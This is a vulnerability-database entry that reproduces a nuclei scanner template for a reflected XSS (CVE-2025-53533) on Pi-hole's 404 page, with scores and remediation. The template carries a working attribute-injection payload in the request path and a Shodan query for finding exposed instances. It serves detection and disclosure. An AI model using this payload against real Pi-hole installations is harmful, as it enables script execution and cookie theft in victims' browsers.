Lucene search
K

Pi-hole Reflected XSS in 404-Error Page

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Pi-hole web interface up to 6.2.1 has a reflected cross site scripting on the 404 page; update to 6.3+

Related
Refs
Code
id: CVE-2025-53533

info:
  name: Pi-hole Reflected XSS in 404-Error Page
  author: DhiyaneshDk
  severity: medium
  description: |
    Pi-hole Admin Interface <= 6.2.1 contains a reflected XSS vulnerability on the 404 error page. The URL path is reflected unsanitized into the `class` attribute of the `body` tag, allowing attribute injection via a crafted URL to execute arbitrary JavaScript in victim browsers.
  impact: |
    Attackers can execute arbitrary JavaScript in victim browsers, potentially stealing cookies or performing actions on behalf of the user.
  remediation: Update to Pi-hole web interface version 6.3 or later.
  reference:
    - https://github.com/pi-hole/web/security/advisories/GHSA-w8f8-92rx-4f6w
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53533
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-53533
    cwe-id: CWE-79
    epss-score: 0.00564
    epss-percentile: 0.42712
  metadata:
    verified: true
    max-request: 1
    vendor: pi-hole
    product: web_interface
    shodan-query: title:"Pi-hole"
  tags: cve,cve2025,pihole,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/"onload=alert(document.domain);>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"onload=alert(document.domain);>">'

      - type: word
        part: body
        words:
          - "pi-hole"

      - type: status
        status:
          - 404
# digest: 4a0a0047304502210086fd87d1055ec8120a30fea18d0a094e45eb2a79c26c3b8d6b27c26cd765fb5a022065ce37920fb9fc6effa44f1e4424d2f134eeae5b6930df7ac2514fc5b033d53c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Apr 2026 06:27Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.16.1
CVSS 45.1
EPSS0.00564
SSVC
6